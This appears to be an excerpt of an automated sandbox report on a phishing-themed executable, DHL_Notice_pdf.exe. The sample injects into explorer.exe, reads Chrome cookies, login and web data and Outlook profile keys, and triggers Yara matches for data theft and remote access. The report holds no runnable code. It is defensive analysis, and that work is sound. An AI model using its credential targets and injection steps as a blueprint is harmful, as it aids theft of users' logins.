Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3452
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Process created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000004.00000000.256717981.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.509870496.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.476512956.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.248850915.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.504678905.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information

Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Remote Access Functionality

Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY